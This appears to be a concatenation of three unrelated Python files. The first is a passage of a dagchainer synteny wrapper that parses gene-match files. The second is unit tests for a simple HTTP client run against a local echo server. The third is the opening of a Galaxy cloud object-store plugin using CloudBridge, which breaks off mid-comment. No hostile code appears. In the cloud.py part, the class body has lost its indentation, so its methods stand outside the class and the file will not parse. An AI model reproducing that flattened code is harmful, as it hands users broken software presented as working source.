        {(a_seqid, b_seqid): {(accn1, accn2): {'A': feat, 'B': feat,
                                               'evalue': e, 'diag_str': hdr}}}
    merge_genes collapses whole diagonals into single genes; best_only keeps
    reciprocal-best hits only.  Pairs worse than evalue_cutoff, and same-
    chromosome hits closer than ignore_dist (the self-self diagonal), are
    dropped.
    """
    # Cache of per-accession feature dicts so each accession is built once.
    accn_info = {}
    matches = {}
    fh = open(dag_file) if dag_file != "-" else sys.stdin
    get_dag_next = get_merge_gene if merge_genes else get_dag_line
    klass = BestDagGenerator if best_only else DagGenerator
    for dag, dag_header in iter(klass(fh, get_dag_next)):
        if dag.evalue >= evalue_cutoff: continue
        if dag.a_seqid == dag.b_seqid:
            # Drop near-diagonal self hits and exact self pairs.
            if abs(dag.a_start - dag.b_start) < ignore_dist: continue
            if dag.a_accn == dag.b_accn: continue
        if not dag.a_accn in accn_info:
            # 'mid' is the feature midpoint used for ordering and dagchainer input.
            mid = int((dag.a_start + dag.a_end + 0.5) / 2)
            a_feat = {'accn': dag.a_accn, 'start': dag.a_start, 'end': dag.a_end, 'mid': mid, 'seqid': dag.a_seqid}
            accn_info[dag.a_accn] = a_feat
        else:
            a_feat = accn_info[dag.a_accn]
        if not dag.b_accn in accn_info:
            mid = int((dag.b_start + dag.b_end + 0.5) / 2)
            b_feat = {'accn': dag.b_accn, 'start': dag.b_start, 'end': dag.b_end, 'mid': mid, 'seqid': dag.b_seqid}
            accn_info[dag.b_accn] = b_feat
        else:
            b_feat = accn_info[dag.b_accn]
        # always sort by seqid and order.
        if dag.a_seqid > dag.b_seqid:
            a_feat, b_feat = b_feat, a_feat
        elif dag.a_seqid == dag.b_seqid and a_feat['mid'] > b_feat['mid']:
            a_feat, b_feat = b_feat, a_feat
        seqid_key = (a_feat['seqid'], b_feat['seqid'])
        if not seqid_key in matches: matches[seqid_key] = {}
        these_matches = matches[seqid_key]
        # Canonical accession ordering so (a,b) and (b,a) dedupe to one key.
        if a_feat['accn'] < b_feat['accn']:
            accn_key = a_feat['accn'], b_feat['accn']
        else:
            accn_key = b_feat['accn'], a_feat['accn']
        if accn_key in these_matches:
            # Keep the best (lowest) e-value for a repeated pair.
            if dag.evalue < these_matches[accn_key]['evalue']: these_matches[accn_key]['evalue'] = dag.evalue
        else:
            these_matches[accn_key] = {'A': a_feat, 'B': b_feat, 'evalue': dag.evalue}
        # Tag the pair with the most recently seen group header.
        these_matches[accn_key]['diag_str'] = dag_header
    # Reset the cross-call header cache for subsequent parses.
    get_dag_line.header = None
    print >>sys.stderr, "pairs:", sum(len(t.values()) for t in matches.values())
    return matches
def parse_cheader(header):
    """ dagchainer.cpp sends a header line: ">Alignment #%d score = %.1f\n"
    we just want the 2 numbers.

    Callers pass in line[1:].strip(), so this receives e.g.
    "Alignment #3 score = 12.5".  Returns (alignment_number, score).
    """
    stuff = header.split()
    # Bug fix: the score field arrives with its newline already stripped, so
    # the old `stuff[-1][:-1]` chopped off the tenths digit ("12.5" -> 12.0).
    return int(stuff[1][1:]), float(stuff[-1])
def run_dag_chainer(a_seqid, b_seqid, filename, matches, reverse, options,
        # child_conn,
        dagchainer=os.path.join(os.path.abspath(os.path.dirname(__file__)), "dagchainer")):
    """
    calls dagchainer and yields groups of matches

    Feeds the midpoints and scores of `matches` to the external `dagchainer`
    binary over stdin and collects its chained diagonals from stdout.
    Returns a list of (dag_num, dag_score, data) tuples where `data` is a
    list of {'pair': ..., 'dag_score': ...} dicts; groups smaller than
    options.min_aligned_pairs are discarded.  (Python 2: writes str to the
    subprocess pipe.)
    """
    reverse = "-r" if "r" in reverse else ""
    o = options
    cmd = "%(dagchainer)s -G %(gap_length)s -O %(gap_init)s -E %(gap_extend)s -S " +\
        "%(min_score)s -D %(max_dist)s -F %(filename)s %(reverse)s" # > %(tmp_file)s";
    cmd = cmd % dict(gap_length=o.gap_dist, gap_init=o.gap_init,
                gap_extend=o.gap_extend, min_score=o.min_score,
                max_dist=o.gap_max, filename="-", reverse=reverse,
                dagchainer=dagchainer)
    #print >>sys.stderr, cmd
    # Indexable snapshot of the pairs; line numbers written to dagchainer
    # are indices into this list.
    num2pair = matches.values()
    """
    if not len(num2pair):
        child_conn.send([])
        child_conn.close()
        return
    """
    process = Popen(cmd, stdin=PIPE, stdout=PIPE, bufsize=8*4096, shell=True)
    write = process.stdin.write
    # One input line per pair: index, a-mid, b-mid, score.
    for i, pair in enumerate(num2pair):
        write("%i\t%i\t%i\t%.4f\n" % (i, pair['A']['mid'], pair['B']['mid'], scoringF(pair['evalue'])))
    process.stdin.close()
    header = None
    all_data = [] # added instead of yield to allow parallelization.
    data = []
    for line in process.stdout:
        if line[0] == ">":
            # A ">" line starts a new alignment group; flush the previous one.
            if header is None:
                header = parse_cheader(line[1:].strip())
            else:
                if len(data) >= o.min_aligned_pairs:
                    #yield header, data
                    dag_num, dag_score = header
                    all_data.append((dag_num, dag_score, data))
                header = parse_cheader(line[1:].strip())
                data = []
            continue
        #index, pair_id, pos1, pos2, match_score, dag_chain_score = line.strip().split()
        pair_id, dag_chain_score = line.rstrip("\n").split(" ")
        pair = num2pair[int(pair_id)]
        data.append({'pair': pair, 'dag_score': float(dag_chain_score)})
    # Flush the final group.
    if len(data) >= o.min_aligned_pairs:
        dag_num, dag_score = header
        all_data.append((dag_num, dag_score, data))
    #child_conn.send(all_data)
    # child_conn.close()
    return all_data
def print_alignment(dir, diag_num, dag_score, group, out):
    # Write one diagonal to `out`: a "#" header line followed by one
    # tab-separated line per gene pair.  Python 2 print-chevron syntax.
    # NOTE(review): relies on the module-global `opts` set in __main__
    # (for new_behavior) rather than taking it as a parameter -- confirm
    # this is never called outside the script entry point.
    # dir is 'f' or 'r'
    # diag_id dagchainer score, a_seqid, b_seqid, dir, npairs
    header_fmt = "#%i\t%.1f\t%s\t%s\t%s\t%i"
    # best tells us to save the polygons for the orthologies
    d = group[0]['pair']
    print >>out, header_fmt % \
        (diag_num, dag_score, d['A']['seqid'],
        d['B']['seqid'], dir, len(group))
    for pair_dict in group:
        A = pair_dict['pair']['A']
        B = pair_dict['pair']['B']
        if opts.new_behavior:
            # New behavior: prefix seqids with 'a'/'b' instead of assuming
            # the input already carries those prefixes.
            print >>out, "%s\t%s\t%d\t%d\t%s\t%s\t%d\t%d\t%e\t%d" % (\
                'a' + A['seqid'][1:], A['accn'], A['start'], A['end'],
                'b' + B['seqid'][1:], B['accn'], B['start'], B['end'],
                pair_dict['pair']['evalue'], pair_dict['dag_score'])
        else:
            print >>out, "%s\t%s\t%d\t%d\t%s\t%s\t%d\t%d\t%e\t%d" % (\
                A['seqid'], A['accn'], A['start'], A['end'],
                B['seqid'], B['accn'], B['start'], B['end'],
                pair_dict['pair']['evalue'], pair_dict['dag_score'])
def run_and_print(all_matches, opts, out=sys.stdout):
    # Run dagchainer over every seqid pair in both orientations.  With a
    # truthy `out` the diagonals are printed; otherwise only the merge
    # bookkeeping tuples are collected and returned.
    filename = "-" # tells dagchainer to read from stdin.
    # if out is False, it means we dont want to print, and so we
    # dont print.
    print_genes = bool(out)
    merge_ids = []
    # Retained for the disabled multiprocessing path below; unused here.
    best = opts.best
    for (a_seqid, b_seqid), matches in sorted(all_matches.iteritems()):
        """
        parent_connf, child_connf = mPipe()
        pf = Process(target=run_dag_chainer, args=(a_seqid, b_seqid, filename, matches, "", opts, child_connf))
        pf.start()
        parent_connr, child_connr = mPipe()
        pr = Process(target=run_dag_chainer, args=(a_seqid, b_seqid, filename, matches, "-r", opts, child_connr))
        pr.start()
        for dag_num, dag_score, group in parent_connf.recv():
            if print_genes:
                print_alignment('f', dag_num, dag_score, group, out, best)
            else:
                # for merged merge we just keep the direction and the 'accn' where
                # the 'accn' is actually just the diag_id for the case of a merge
                # run. this is used later to merge the merge with the genes.
                # since the 'A' and 'B' accn are the same (except for the starting
                # letter, just keep 'A'.
                merge_ids.append(('f', a_seqid, b_seqid,
                    [g['pair']['A']['accn'][1:] for g in group],
                    len(group)))
        pf.join()
        for dag_num, dag_score, group in parent_connr.recv():
            if print_genes:
                print_alignment('r', dag_num, dag_score, group, out, best)
            else:
                merge_ids.append(('r', a_seqid, b_seqid,
                    [g['pair']['A']['accn'][1:] for g in group],
                    len(group)))
        pr.join()
        """
        # Serial path: forward ('f') then reverse ('r') orientation.
        for dir in ("f", "r"):
            for dag_num, dag_score, group in run_dag_chainer(a_seqid, b_seqid, filename, matches, dir, opts):
                if print_genes:
                    print_alignment(dir, dag_num, dag_score, group, out)
                else:
                    # for merged merge we just keep the direction and the 'accn' where
                    # the 'accn' is actually just the diag_id for the case of a merge
                    # run. this is used later to merge the merge with the genes.
                    # since the 'A' and 'B' accn are the same (except for the starting
                    # letter, just keep 'A'.
                    merge_ids.append((dir, a_seqid, b_seqid,
                        [g['pair']['A']['accn'][1:] for g in group],
                        len(group)))
    return merge_ids
######################
## merge diags stuff ##
######################
def merge_merge(merge, all_matches, opts, out):
    """ merge the merge genes with the
    original dag data sent in

    `merge` holds (dir, a_seqid, b_seqid, diag_str_list, npairs) tuples from
    the merged run; each referenced diagonal is expanded back into its
    original gene-level dag lines and printed to `out` as one merged group.
    """
    #cols = ('id', 'dagscore', 'a_seqid', 'b_seqid', 'dir', 'ngenes')
    by_diag = matches_by_diag_id(all_matches)
    # want the longest first. then we remove shorter ones that are completely contained
    # in the larger ones.
    seen = {}
    merge.sort(key=operator.itemgetter(4), reverse=True)
    for i, (direction, a_seqid, b_seqid, diag_str_list, llen) in enumerate(merge):
        # so here we have a list of merge-diags merged into a single diag...
        dags = []
        # and we go through and merge them into dags[].
        # TODO: need to sort this out better. can merge-diags with opposite directions
        # be merged??? when?
        for diag_str in diag_str_list:
            if not diag_str in by_diag: continue
            these_dags = by_diag[diag_str]
            #for d in by_diag[diag_str]:
            #    these_dags.append(d)
            # Drop pairs already claimed by a longer merged group.
            unseen_dags = [t for t in these_dags if not (t.a_accn, t.b_accn) in seen]
            for ud in unseen_dags: seen[(ud.a_accn, ud.b_accn)] = None
            # Keep the diagonal if enough of it is new (absolute or fractional).
            if len(unseen_dags) >= opts.min_aligned_pairs / 2. \
                    or len(unseen_dags) / float(len(these_dags)) > 0.60:
                dags.extend((str(ud) for ud in unseen_dags))
        if len(dags) >= opts.min_aligned_pairs:
            # Synthetic header: merged groups get a fixed 100.0 score.
            header = "#" + "\t".join([str(i), "100.0", a_seqid, b_seqid, direction,
                str(len(dags))])
            print >>out, header
            print >>out, "\n".join(dags)
def matches_by_diag_id(matches):
    """ take the structure returned by parse_file and return a dictionary
    where the keys are the diag_ids and the values are the dag-pair."""
    by_diag = collections.defaultdict(list)
    for accn_pair_dict in matches.values():
        for accn_pair in accn_pair_dict.values():
            assert accn_pair['diag_str'] is not None
            by_diag[accn_pair['diag_str']].append(DagLine.from_pair_dict(accn_pair))
    return dict(by_diag)
def adjust_opts_for_merge(opts):
    """Mutate `opts` in place for the second (merge) dagchainer pass.

    Diagonals have been collapsed to single genes, so a merged 'diagonal'
    needs only one pair; the gap parameters are widened, defaulting to
    4x / 5x the gene-level values when --gm / --Dm were not given.
    """
    opts.min_aligned_pairs = 1
    opts.min_score = int(opts.min_aligned_pairs * 0.5 * opts.max_match_score)
    if opts.gap_dist_merge != 0:
        opts.gap_dist = opts.gap_dist_merge
    else:
        opts.gap_dist = 4 * opts.gap_dist
    if opts.gap_max_merge != 0:
        opts.gap_max = opts.gap_max_merge
    else:
        opts.gap_max = 5 * opts.gap_max
    assert 0 < opts.gap_dist < opts.gap_max
if __name__ == "__main__":
    import optparse, sys
    p = optparse.OptionParser()
    p.add_option('-i', dest='dag', help="""dag file with format
a_seqid<tab>a_accn<tab>a_start<tab>a_end<tab>b_seqid<tab>b_accn<tab>b_start<tab>b_end<tab>e-value""")
    p.add_option('-o', dest='gap_init', type='float', default=0,
            help="gap open penalty")
    p.add_option('-e', dest='gap_extend', type='float', default=-3,
            help="gap extension penalty")
    p.add_option('-x', dest="min_score", type='float', default=None,
            help="minimum alignment score. alignment stops when score " + \
            " below this value")
    p.add_option('-g', dest='gap_dist', type='float', default=10000,
            help="averge distance expected between 2 syntenic genes")
    p.add_option('--gm', dest='gap_dist_merge', type='float', default=0,
            help="averge distance expected between 2 syntenic merged genes"
            " only applicable if --merge is specified")
    p.add_option('-D', dest='gap_max', type='float', default=200000,
            help="maximum distance between 2 matches")
    p.add_option('--Dm', dest='gap_max_merge', type='float', default=0,
            help="maximum distance expected between 2 syntenic merged genes"
            " only applicable if --merge is specified")
    p.add_option('-E', dest='evalue', type='float', default=1e-5,
            help="maximum evalue.")
    p.add_option('-A', dest='min_aligned_pairs', type='int', default=6,
            help="minimum number of pairs to be considered a diagonal")
    p.add_option('-I', dest='ignore_dist', default=25, type='int',
            help="ignore hits on teh same chromosome within this distance"
            " removes the self-self diagonal")
    p.add_option('-M', dest='max_match_score', type='float', default=50,
            help="maximum score to be assigned to a match")
    p.add_option('--new_behavior',action="store_true",
            help="does not require the first listed gene to be an 'a' and the second a 'b'")
    p.add_option('--merge', dest='merge', default=None,
            help=\
            """ path to a file to send the output. when this is specified, the the
    output is sent to the specified file. then dagchainer is re-run with
    --gm and --Dm (corresponding to -g and -D in this help menu. but run
    with each diagonal in the original output as a single gene the
    resulting 'merged'-genes are run as normal through dagchainer. the
    final ouput file with the name of this value + ".merge", will contain
    genes merged into merge groups.
    """)
    p.add_option('--best', dest='best', default=False, action='store_true', help=\
            "use only the reciprocal best hit in defining the dag lines. this"
            " useful for defining orthologies. output to stdout will be pairs"
            " as usual")
    # dag file can also be sent in as the first arg.
    opts, maybe_dag = p.parse_args()
    print >>sys.stderr, opts
    if not (opts.dag or maybe_dag):
        sys.exit(p.print_help())
    if not opts.dag: opts.dag = maybe_dag[0]
    if opts.min_score is None:
        # Default minimum chain score scales with the pair/score settings.
        opts.min_score = int(opts.min_aligned_pairs * 0.5 * opts.max_match_score)
    # so here, we run the original dag_chainer. and save to opts.merge.
    all_matches = parse_file(opts.dag, opts.evalue, opts.ignore_dist, merge_genes=False, best_only=opts.best)
    out_file = open(opts.merge, 'wb') if opts.merge else sys.stdout
    run_and_print(all_matches, opts, out=out_file)
    #opts.best = False # never have best and merge...
    # NOTE(review): this unconditional exit makes the entire --merge
    # post-processing below unreachable; it looks like a debugging
    # leftover -- confirm before removing it.
    sys.exit()
    if opts.merge:
        out_file.close()
        # then we read that output file, merging the genes.
        merged_dags = parse_file(opts.merge, opts.evalue, opts.ignore_dist, merge_genes=True, best_only=False)
        # doh! still need to re-parse original. but it's pretty short compared to the original
        # opts.dag so it's pretty fast.
        unmerged_dags = parse_file(opts.merge, opts.evalue, opts.ignore_dist, merge_genes=False, best_only=False)
        # then we run and print without printing.
        adjust_opts_for_merge(opts)
        # run it to get the merge, but dont print.
        merge = run_and_print(merged_dags, opts, out=False)
        out_file = open(opts.merge + ".merge", 'wb')
        merge_merge(merge, unmerged_dags, opts, out_file)
|
freetests.py | #!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
# Local-only test server address; the port is randomized per run so that a
# lingering socket from a previous run (TIME_WAIT) cannot collide with us.
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
# Module under test; swap in your own implementation via the lines below.
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
    """Test HTTP handler whose behaviour is swapped per-test.

    Tests assign plain functions (taking the handler as ``self``) to the
    ``post``/``get`` class attributes; each request is delegated to the
    current hook, or ignored when the hook is unset.
    """

    post = None  # hook invoked for POST requests, or None to do nothing
    get = None   # hook invoked for GET requests, or None to do nothing

    def do_POST(self):
        try:
            # idiom fix: identity comparison with None, not ==
            if self.post is None:
                return None
            return self.post()
        except Exception as e:
            print("Exception %s\n" % e)
            # bare raise preserves the original traceback (raise e re-wraps)
            raise

    def do_GET(self):
        try:
            print("GET %s\n" % self.path)
            if self.get is None:
                return None
            return self.get()
        except Exception as e:
            print("Exception %s\n" % e)
            raise
def make_http_server(host=BASEHOST, port=BASEPORT):
    """Build an HTTPServer bound to *host*:*port* that serves MyHTTPHandler."""
    address = (host, port)
    return http.server.HTTPServer(address, MyHTTPHandler)
# always returns 404
def nothing_available(self):
    """GET/POST hook: reply 404 to every request.

    ``send_error()`` already emits the status line, headers, and an HTML
    error body; the follow-up ``end_headers()``/``wfile.write()`` calls in
    the original appended stray bytes after a completed response, so they
    are dropped here.
    """
    self.send_error(404, "File not found")
# repeats your path back
def echo_path_get(self):
    """GET hook: answer 200 text/plain with the request path echoed back."""
    self.send_response(200)
    self.send_header("Content-type", "text/plain")
    self.end_headers()
    body = "%s\n" % self.path
    self.wfile.write(body.encode("utf-8"))
# repeats your post back as json
def echo_post(self):
    """POST hook: parse the urlencoded request body and echo it back as JSON."""
    size = int(self.headers['Content-Length'])
    raw = self.rfile.read(size).decode('utf-8')
    form = urllib.parse.parse_qs(raw)
    self.send_response(200)
    self.send_header("Content-type", "application/json")
    self.end_headers()
    self.wfile.write(json.dumps(form).encode("utf-8"))
def header_check(self):
    """GET hook: 200 when a Host header is present, otherwise 400.

    The JSON body always lists the detected errors (empty list on success).
    """
    errors = []
    if 'Host' not in self.headers:
        errors.append("No Host header found")
    status = 400 if errors else 200
    self.send_response(status)
    self.send_header("Content-type", "application/json")
    self.end_headers()
    self.wfile.write(json.dumps(errors).encode("utf-8"))
def die_on_method(self):
    """Hook for the *wrong* HTTP verb: always 405, also noting a missing Host."""
    errors = ["Method Not Allowed"]
    if 'Host' not in self.headers:
        errors.append("No Host header found")
    self.send_response(405)
    self.send_header("Content-type", "application/json")
    self.end_headers()
    self.wfile.write(json.dumps(errors).encode("utf-8"))
def post_header_check(self):
    """POST hook: 200 when Host and Content-Length headers exist, else 400."""
    errors = []
    # Check both required headers, reporting every one that is missing.
    for header, message in (('Host', "No Host header found"),
                            ('Content-length', "No Content-Length header found")):
        if header not in self.headers:
            errors.append(message)
    status = 400 if errors else 200
    self.send_response(status)
    self.send_header("Content-type", "application/json")
    self.end_headers()
    self.wfile.write(json.dumps(errors).encode("utf-8"))
class TestHTTPClient(unittest.TestCase):
    """End-to-end tests driving httpclass.HTTPClient against a local server."""

    # Class-level singletons shared by every test in this class.
    httpd = None
    running = False

    @classmethod
    def setUpClass(self):
        '''Cache the httpd server and run it as a thread'''
        # NOTE(review): the first argument of a classmethod is conventionally
        # named ``cls``; ``self`` here is actually the class object.
        if (TestHTTPClient.httpd == None):
            try:
                # NOTE(review): Thread.start() returns None, so self.thread is
                # always None; the Thread object itself is discarded here.
                self.thread = threading.Thread(target=self.run_server).start()
                time.sleep(1)  # give the server thread a moment to bind/listen
            except Exception as e:
                print(e)
                print("setUP: Thread died")
                raise(e)

    @classmethod
    def run_server(self):
        '''run the httpd server in a thread'''
        try:
            # Allow quick restarts without "address already in use" errors.
            socketserver.TCPServer.allow_reuse_address = True
            http.server.HTTPServer.allow_reuse_address = True
            TestHTTPClient.httpd = make_http_server()
            print("HTTP UP!\n")
            TestHTTPClient.httpd.serve_forever()  # blocks until shutdown()
            print("HTTP has been shutdown!\n")
        except Exception as e:
            print(e)
            print("run_server: Thread died")

    def test404GET(self):
        '''Test against 404 errors'''
        MyHTTPHandler.get = nothing_available
        # NOTE(review): the local name ``http`` shadows the imported module.
        http = httpclass.HTTPClient()
        req = http.GET("http://%s:%d/49872398432" % (BASEHOST, BASEPORT))
        self.assertTrue(req != None, "None Returned!")
        self.assertTrue(req.code == 404)

    def test404POST(self):
        '''Test against 404 errors'''
        MyHTTPHandler.post = nothing_available
        http = httpclass.HTTPClient()
        req = http.POST("http://%s:%d/49872398432" % (BASEHOST, BASEPORT))
        self.assertTrue(req != None, "None Returned!")
        self.assertTrue(req.code == 404)

    def testGET(self):
        '''Test HTTP GET'''
        MyHTTPHandler.get = echo_path_get
        http = httpclass.HTTPClient()
        path = "abcdef/gjkd/dsadas"
        url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
        req = http.GET(url)
        self.assertTrue(req != None, "None Returned!")
        self.assertTrue(req.code == 200)
        # The echo server writes the request path back into the body.
        self.assertTrue(req.body.find(path) >= 0, "Data: [%s] " % req.body)

    def testGETHeaders(self):
        '''Test HTTP GET Headers'''
        # GET is validated; a POST to this endpoint is a method error.
        MyHTTPHandler.get = header_check
        MyHTTPHandler.post = die_on_method
        http = httpclass.HTTPClient()
        path = "abcdef/gjkd/dsadas"
        url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
        req = http.GET(url)
        self.assertTrue(req != None, "None Returned!")
        self.assertTrue(req.code == 200)

    def testPOSTHeaders(self):
        '''Test HTTP POST Headers'''
        # POST is validated; a GET to this endpoint is a method error.
        MyHTTPHandler.post = post_header_check
        MyHTTPHandler.get = die_on_method
        http = httpclass.HTTPClient()
        path = "abcdef/gjkd/dsadas"
        url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
        req = http.POST(url)
        self.assertTrue(req != None, "None Returned!")
        self.assertTrue(req.code == 200, "Code is %s but I wanted a 200 OK" % req.code)

    # consider disabling this test until everything else works
    def testInternetGets(self):
        '''Test HTTP Get in the wild, these webservers are far less
        forgiving'''
        # NOTE(review): requires live network access and third-party sites;
        # failures here may be environmental rather than client bugs.
        MyHTTPHandler.get = echo_path_get
        http = httpclass.HTTPClient()
        urls = [
            "http://www.cs.ualberta.ca/",
            "http://softwareprocess.es/static/SoftwareProcess.es.html",
            "http://c2.com/cgi/wiki?CommonLispHyperSpec",
            "http://slashdot.org"
        ]
        for url in urls:
            try:
                req = http.GET(url)
            except Exception as e:
                print("An Exception was thrown for %s" % url)
                self.assertTrue(False, "An Exception was thrown for %s %s" % (url, e))
            self.assertTrue(req != None, "None Returned! %s" % url)
            # Accept redirects as well as plain success.
            self.assertTrue(req.code == 200 or
                            req.code == 301 or
                            req.code == 302,
                            "Code: %s for %s" % (req.code, url))
            if (req.code == 200):
                self.assertTrue(req.body.find("DOCTYPE") >= 0 or
                                req.body.find("<body") >= 0,
                                "%s Data: [%s] " % (url, req.body))

    def testPOST(self):
        '''Test HTTP POST with an echo server'''
        MyHTTPHandler.post = echo_post
        http = httpclass.HTTPClient()
        path = "post_echoer"
        url = "http://%s:%d/%s" % (BASEHOST, BASEPORT, path)
        args = {'a': 'aaaaaaaaaaaaa',
                'b': 'bbbbbbbbbbbbbbbbbbbbbb',
                'c': 'c',
                'd': '012345\r67890\n2321321\n\r'}
        print("Sending POST!")
        req = http.POST(url, args=args)
        self.assertTrue(req != None, "None Returned!")
        self.assertTrue(req.code == 200)
        print("Test Post Body: [%s]" % req.body)
        # parse_qs wraps each value in a list, hence outargs[key][0].
        outargs = json.loads(req.body)
        print(outargs.__class__)
        for key in args:
            self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
        for key in outargs:
            self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)

    @classmethod
    def tearDownClass(self):
        # Stop the shared server (if one was started) and release the socket.
        if (TestHTTPClient.httpd != None):
            print("HTTP Shutdown in tearDown\n")
            TestHTTPClient.httpd.shutdown()
            TestHTTPClient.httpd.server_close()
            time.sleep(1)
def test_test_webserver():
    """Manual helper: serve the echo handlers forever so a human can poke them."""
    print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST, BASEPORT))
    MyHTTPHandler.get = echo_path_get
    MyHTTPHandler.post = echo_post
    server = make_http_server()
    try:
        server.serve_forever()
    finally:
        server.shutdown()
if __name__ == '__main__':
    # Run the whole suite when invoked directly: python freetests.py
    unittest.main()
|
cloud.py | """
Object Store plugin for Cloud storage.
"""
import logging
import multiprocessing
import os
import os.path
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
umask_fix_perms,
unlink,
)
from galaxy.util.sleeper import Sleeper
from .s3 import parse_config_xml
from ..objectstore import ConcreteObjectStore, convert_bytes
try:
    from cloudbridge.factory import CloudProviderFactory, ProviderList
    from cloudbridge.interfaces.exceptions import InvalidNameException
except ImportError:
    # CloudBridge is optional; _initialize() raises a clear error if the
    # store is actually used without it.  Define *every* imported name so
    # later references (e.g. ``except InvalidNameException`` in
    # Cloud._get_bucket) fail gracefully instead of with a NameError.
    CloudProviderFactory = None
    ProviderList = None

    class InvalidNameException(Exception):
        """Placeholder used when CloudBridge is not installed."""
# Module-level logger named after this module.
log = logging.getLogger(__name__)

# Reported when the store is configured but CloudBridge is not importable.
# NOTE(review): the two literals concatenate without a space between the
# sentences; the emitted message reads "...available.Please install...".
NO_CLOUDBRIDGE_ERROR_MESSAGE = (
    "Cloud ObjectStore is configured, but no CloudBridge dependency available."
    "Please install CloudBridge or modify ObjectStore configuration."
)
class CloudConfigMixin:
    """Serializes a cloud object store's settings into the standard dict shape."""

    def _config_to_dict(self):
        """Return this store's configuration as a plain nested dict."""
        bucket = {
            "name": self.bucket_name,
            "use_reduced_redundancy": self.use_rr,
        }
        connection = {
            "host": self.host,
            "port": self.port,
            "multipart": self.multipart,
            "is_secure": self.is_secure,
            "conn_path": self.conn_path,
        }
        cache = {
            "size": self.cache_size,
            "path": self.staging_path,
        }
        return {
            "provider": self.provider,
            "auth": self.credentials,
            "bucket": bucket,
            "connection": connection,
            "cache": cache,
        }
class Cloud(ConcreteObjectStore, CloudConfigMixin):
"""
Object store that stores objects as items in an cloud storage. A local
cache exists that is used as an intermediate location for files between
Galaxy and the cloud storage.
"""
store_type = 'cloud'
def __init__(self, config, config_dict):
    """Wire up the store from its parsed configuration and start helpers.

    ``config_dict`` is the parsed form produced by ``parse_xml()`` /
    ``_config_to_dict()``: it must contain "provider", "auth", "bucket" and
    "cache" sections; "connection" is optional.
    """
    super().__init__(config, config_dict)
    self.transfer_progress = 0
    bucket_dict = config_dict['bucket']
    connection_dict = config_dict.get('connection', {})
    cache_dict = config_dict['cache']
    self.provider = config_dict["provider"]
    self.credentials = config_dict["auth"]
    self.bucket_name = bucket_dict.get('name')
    self.use_rr = bucket_dict.get('use_reduced_redundancy', False)
    # NOTE(review): not read anywhere in this file -- presumably consumed by
    # the multipart upload path; confirm units (looks like MB).
    self.max_chunk_size = bucket_dict.get('max_chunk_size', 250)
    self.host = connection_dict.get('host', None)
    self.port = connection_dict.get('port', 6000)
    self.multipart = connection_dict.get('multipart', True)
    self.is_secure = connection_dict.get('is_secure', True)
    self.conn_path = connection_dict.get('conn_path', '/')
    # Cache size is configured in GB; -1 means "no limit, never clean".
    self.cache_size = cache_dict.get('size', -1)
    self.staging_path = cache_dict.get('path') or self.config.object_store_cache_path
    self._initialize()
def _initialize(self):
    """Connect to the provider, ensure the bucket, and start cache cleaning.

    :raises Exception: if CloudBridge is not installed.
    """
    if CloudProviderFactory is None:
        raise Exception(NO_CLOUDBRIDGE_ERROR_MESSAGE)
    self.conn = self._get_connection(self.provider, self.credentials)
    self.bucket = self._get_bucket(self.bucket_name)
    # Start the cache monitor only when a size limit was set in galaxy.ini.
    if self.cache_size != -1:
        # Convert GBs to bytes for comparison
        self.cache_size = self.cache_size * 1073741824
        # Helper for interruptable sleep
        self.sleeper = Sleeper()
        self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
        self.cache_monitor_thread.start()
        log.info("Cache cleaner manager started")
    # Use 'axel' for parallel downloads when it is on PATH.  Probing with
    # shutil.which avoids actually spawning axel (the previous
    # ``subprocess.call('axel')`` printed its usage output on every startup).
    self.use_axel = shutil.which('axel') is not None
@staticmethod
def _get_connection(provider, credentials):
    """Build a CloudBridge provider connection.

    :param provider: one of "aws", "azure", "google" (already lower-cased).
    :param credentials: provider-specific auth dict as built by parse_xml().
    :raises Exception: for an unsupported provider name.
    """
    log.debug(f"Configuring `{provider}` Connection")
    if provider == "aws":
        config = {"aws_access_key": credentials["access_key"],
                  "aws_secret_key": credentials["secret_key"]}
        connection = CloudProviderFactory().create_provider(ProviderList.AWS, config)
    elif provider == "azure":
        config = {"azure_subscription_id": credentials["subscription_id"],
                  "azure_client_id": credentials["client_id"],
                  "azure_secret": credentials["secret"],
                  "azure_tenant": credentials["tenant"]}
        connection = CloudProviderFactory().create_provider(ProviderList.AZURE, config)
    elif provider == "google":
        config = {"gcp_service_creds_file": credentials["credentials_file"]}
        connection = CloudProviderFactory().create_provider(ProviderList.GCP, config)
    else:
        raise Exception(f"Unsupported provider `{provider}`.")
    # Ideally it would be better to assert if the connection is
    # authorized to perform operations required by ObjectStore
    # before returning it (and initializing ObjectStore); hence
    # any related issues can be handled properly here, and ObjectStore
    # can "trust" the connection is established.
    #
    # However, the mechanism implemented in Cloudbridge to assert if
    # a user/service is authorized to perform an operation, assumes
    # the user/service is granted with an elevated privileges, such
    # as admin/owner-level access to all resources. For a detailed
    # discussion see:
    #
    # https://github.com/CloudVE/cloudbridge/issues/135
    #
    # Hence, if a resource owner wants to only authorize Galaxy to r/w
    # a bucket/container on the provider, but does not allow it to access
    # other resources, Cloudbridge may fail asserting credentials.
    # For instance, to r/w an Amazon S3 bucket, the resource owner
    # also needs to authorize full access to Amazon EC2, because Cloudbridge
    # leverages EC2-specific functions to assert the credentials.
    #
    # Therefore, to adhere with principle of least privilege, we do not
    # assert credentials; instead, we handle exceptions raised as a
